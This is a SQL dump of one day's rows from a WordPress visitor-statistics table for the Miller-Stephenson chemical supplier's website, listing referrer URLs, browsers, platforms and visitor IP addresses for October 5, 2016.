INSERT INTO `wp_statistics_visitor` VALUES (143, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (144, '2016-10-05', 'https://www.google.co.th/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwj0ieKZwMLPAhXBPo8KHRp3DpAQFggkMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepon-1163%2F&usg=AFQjCNG9Isn1VysiNy04FUNF5O01_kFFhQ&sig2=YPAGMbmMuDHteDryUYxByg&bvm=bv.134495766,d.c2I', 'MSIE', 'Windows', '11.0', '', '202.47.224.210', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (145, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '50.0.2661.102', '', '54.153.68.70', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (146, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '31.193.51.105', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (147, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Firefox', 'Windows', '44.0', '', '91.200.12.141', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (148, '2016-10-05', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '174.119.124.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (149, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '48.0.2564.97', '', '91.200.12.7', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (150, '2016-10-05', 'https://r.search.yahoo.com/RV=1/RE=1475660568/RB=/RO=8/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fms-907-two-part-epoxy-adhesive%2f/RS=^ADA9iiJOIYapPCaOyd3Bui3Om91yr4-', 'Safari', 'iPhone', '7.0', '', '66.85.230.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (151, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Chrome', 'Windows', '47.0.2526.111', '', '91.200.12.141', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (152, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Firefox', 'Windows', '43.0', '', '91.200.12.7', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (153, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '24.0.1284.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (154, '2016-10-05', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwihspj7x8LPAhXJnZQKHd8KB4EQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fms-143te%2F&usg=AFQjCNF6jjAGN88WymDaKyQE9yIG2E5zDQ&bvm=bv.134495766,d.dGo', 'MSIE', 'Windows', '11.0', '', '202.214.226.140', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (155, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', '9.0', '', '199.185.0.3', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (156, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '174.102.19.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (157, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '137.229.78.0', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (158, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '49.0.2623.22', '', '110.84.156.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (159, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '50.90.32.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (160, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.68.94.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (161, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.116', '', '128.84.125.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (162, '2016-10-05', 'android-app://com.google.android.googlequicksearchbox', 'Chrome', 'Android', '52.0.2743.98', '', '63.155.22.108', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (163, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Firefox', 'Windows', '43.0', '', '91.200.12.143', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (164, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.204', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (165, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (166, '2016-10-05', 'https://www.google.ca/', 'Safari', 'Macintosh', '9.1.2', '', '173.34.172.204', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (167, '2016-10-05', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (168, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/conformal-coatings/', 'Opera Next', 'Windows', '34.0.2036.50', '', '91.200.12.143', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (169, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.216', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (170, '2016-10-05', 'https://www.miller-stephenson.com/the-chemours-company-selects-wilmington-delaware-for-its-global-headquarters/', 'MSIE', 'Windows', '9.0', '', '204.79.180.159', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (171, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (172, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.213.240.189', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (173, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CFAQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=NW30V4vKCM_pKrqvAQ&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Chrome', 'Android', '44.0.2403.133', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (174, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'Chrome', 'Android', '44.0.2403.133', '', '66.249.88.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (175, '2016-10-05', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.143', '', '210.59.176.240', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (176, '2016-10-05', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPad', '601.1.46', '', '73.38.223.138', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (177, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (178, '2016-10-05', 'https://www.miller-stephenson.com/contact/', 'Chrome', 'Windows', '21.0.1180.89', '', '101.226.167.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (179, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '202.212.14.43', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (180, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.166', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (181, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (182, '2016-10-05', 'https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiA2eGa3cLPAhVKOo8KHea4CGMQFggbMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FMS-122AD.pdf&usg=AFQjCNEHYvrBDicFr_0ThYtNVdYZMxT3lA&bvm=bv.134495766,d.c2I', 'MSIE', 'Windows', '11.0', '', '218.248.36.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (183, '2016-10-05', 'https://www.bing.com/search?q=MS-122AD&src=IE-SearchBox&FORM=IENTTR&conversationid=', 'MSIE', 'Windows', '11.0', '', '82.116.59.70', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (184, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.191.84.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (185, '2016-10-05', 'https://meds-online24.com/', 'MSIE', 'Windows', '6.0', '', '46.211.197.35', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (186, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (187, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/solvents/opteon-solvents/', 'MSIE', 'Windows', '9.0', '', '204.79.180.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (188, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '2.0.0.6', '', '52.89.244.99', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (189, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '10.45.23.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (190, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.23', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (191, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '9.0', '', '204.79.180.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (192, '2016-10-05', 'https://www.google.com/', 'Chrome', 'Android', '52.0.2743.98', '', '66.87.130.157', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (193, '2016-10-05', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '76.16.68.117', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (194, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.200.110.241', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (195, '2016-10-05', 'https://www.miller-stephenson.com/miller/vazo_overview.html', 'MSIE', 'Windows', '9.0', '', '182.118.22.142', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (196, '2016-10-05', 'https://www.google.com/', 'Chrome', 'iPhone', '53.0.2785.109', '', '68.231.43.89', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (197, '2016-10-05', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjlmbex6sLPAhUJpZQKHQk5AmQQFggaMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.dGo', 'MSIE', 'Windows', '11.0', '', '125.139.135.144', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (198, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '121.154.154.171', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (199, '2016-10-05', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '121.200.54.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (200, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '121.200.54.98', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (201, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (202, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (203, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.69', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (204, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (205, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '192.3.145.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (206, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '192.3.151.138', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (207, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.158.201.65', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (208, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '61.135.221.56', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (209, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (210, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '31.0', '', '54.172.1.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (211, '2016-10-05', 'https://www.bing.com/search?q=MILLER+STEPHENS&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.202', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (212, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.135', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (213, '2016-10-05', 'https://read.nxtbook.com/wiley/plasticsengineering/julyaugust2014/raisingthebarforblowmolding.html', 'Chrome', 'Windows', '52.0.2743.116', '', '117.208.233.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (214, '2016-10-05', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '120.21.62.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (215, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.174.151.226', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (216, '2016-10-05', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.116', '', '211.76.175.171', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (217, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.170.78', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (218, '2016-10-05', 'https://www.bing.com/search?q=EPON+resin&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.235', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (219, '2016-10-05', 'https://www.bing.com/search?q=EPON+resin&form=MSNH14&sc=8-4&sp=-1&qs=n&sk=', 'MSIE', 'Windows', '9.0', '', '204.79.180.105', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (220, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.45', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (221, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.161', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (222, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/vazo/', 'MSIE', 'Windows', '9.0', '', '204.79.180.95', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (223, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '103.211.17.87', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (224, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (225, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (226, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (227, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2224.3', '', '195.22.127.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (228, '2016-10-05', 'https://www.uroki.net/', 'MSIE', 'Windows', '6.0', '', '178.137.82.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (229, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.234', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (230, '2016-10-05', 'https://www.miller-stephenson.com/product/milglide-compounding-additives/', 'MSIE', 'Windows', '9.0', '', '204.79.180.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (231, '2016-10-05', 'https://www.google.co.uk/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.136.188.68', '000', 63, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (232, '2016-10-05', 'https://ttsgco.blogfa.com/', 'Firefox', 'Windows', '49.0', '', '5.250.3.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (233, '2016-10-05', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (234, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.92', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (235, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.131', '', '62.73.8.84', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (236, '2016-10-05', 'https://www.miller-stephenson.com', 'VB', 'Unknown', 'Unknown', '', '115.119.113.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (237, '2016-10-05', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiy8frFkMPPAhVBGpQKHfBPD7MQFggxMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fmiller%2Fpdf%2FHeloxy.pdf&usg=AFQjCNEqJwggoJGvKB1ZOMq8A9m4dLsWyw&bvm=bv.134495766,d.dGo&cad=rjt', 'MSIE', 'Windows', '11.0', '', '112.136.218.158', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (238, '2016-10-05', 'https://www.google.de/', 'Safari', 'Macintosh', '9.1.1', '', '93.209.80.234', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (239, '2016-10-05', 'https://www.miller-stephenson.com', 'Dalvik', 'Android', '2.1.0', '', '109.253.145.179', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (240, '2016-10-05', 'https://www.spacetechexpo.com/visit/exhibitor-list-2016', 'Chrome', 'Windows', '53.0.2785.143', '', '125.22.105.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (241, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '76.115.186.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (242, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.16', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (243, '2016-10-05', 'https://www.miller-stephenson.com/product/vazo-52/', 'MSIE', 'Windows', '9.0', '', '204.79.180.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (244, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '202.65.158.54', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (245, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.82', '', '78.109.11.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (246, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (247, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (248, '2016-10-05', 'https://astana.xkaz.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (249, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.124', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (250, '2016-10-05', 'https://www.google.co.in/', 'Firefox', 'Windows', '50.0', '', '119.226.228.242', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (251, '2016-10-05', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '29.0', '', '54.69.4.240', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (252, '2016-10-05', 'https://www.google.lv/', 'Chrome', 'Windows', '53.0.2785.143', '', '195.20.127.129', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (253, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.109', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (254, '2016-10-05', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '204.79.180.143', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (255, '2016-10-05', 'https://www.miller-stephenson.com', 'Safari', 'Windows', '538.1', '', '41.33.248.226', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (256, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (257, '2016-10-05', 'https://www.miller-stephenson.com/krytox/', 'MSIE', 'Windows', '9.0', '', '204.79.180.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (258, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '123.20.151.161', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (259, '2016-10-05', 'https://www.google.com.vn/', 'Safari', 'iPad', '9.0', '', '171.237.70.78', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (260, '2016-10-05', 'https://www.electroyou.it/forum/viewtopic.php?f=1&t=42874&start=60', 'Firefox', 'Windows', '45.0', '', '81.200.231.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (261, '2016-10-05', 'https://www.google.co.za/url?url=https://www.miller-stephenson.com/miller/contact.html&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwil4LXdrcPPAhUmAcAKHav4AJMQjBAIGzAB&usg=AFQjCNFmmku7i_9VW8helmzSnKNj7tL3uw', 'MSIE', 'Windows', '9.0', '', '105.225.251.7', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (262, '2016-10-05', 'https://www.google.co.in/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwjdjq-OrsPPAhVWzmMKHVB9AOEQFghRMAs&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fepoxy-resin-systems%2Fepon-epoxy%2Funmodified-liquid-epoxy-resins%2F&usg=AFQjCNERfzSQW7qJ8Zh2t1kzFsc8V1syIA&bvm=bv.134495766,d.dGo', 'MSIE', 'Windows', '11.0', '', '220.225.213.172', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (263, '2016-10-05', 'https://www.google.co.in/', 'Chrome', 'Android', '43.0.2357.93', '', '1.39.46.165', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (264, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.220', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (265, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.66', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (266, '2016-10-05', 'https://vykup-avto-krasnodar.ru/', 'MSIE', 'Windows', '6.0', '', '178.137.84.86', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (267, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.152.186.156', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (268, '2016-10-05', 'https://www.miller-stephenson.com/chemicals/lubricants/', 'MSIE', 'Windows', '9.0', '', '204.79.180.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (269, '2016-10-05', 'https://www.miller-stephenson.com', 'Opera Next', 'Windows', '36.0.2130.32', '', '46.119.127.129', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (270, '2016-10-05', 'https://www.google.dk/', 'Chrome', 'Windows', '53.0.2785.143', '', '80.167.93.177', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (271, '2016-10-05', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.165.109.198', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (272, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.217', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (273, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.17', '', '83.166.240.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (274, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.101', '', '129.233.2.251', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (275, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.77', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (276, '2016-10-05', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.183', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (277, '2016-10-05', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj_s7eAv8PPAhWBMSYKHUmHAQEQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.134495766,d.cWw', 'MSIE', 'Windows', '11.0', '', '192.107.246.16', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (278, '2016-10-05', 'https://www.google.lt/', 'Chrome', 'Windows', '53.0.2785.143', '', '185.11.27.10', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (279, '2016-10-05', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '134.223.116.201', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (280, '2016-10-05', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (281, '2016-10-05', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '129.55.200.20', '000', 17, 0); 
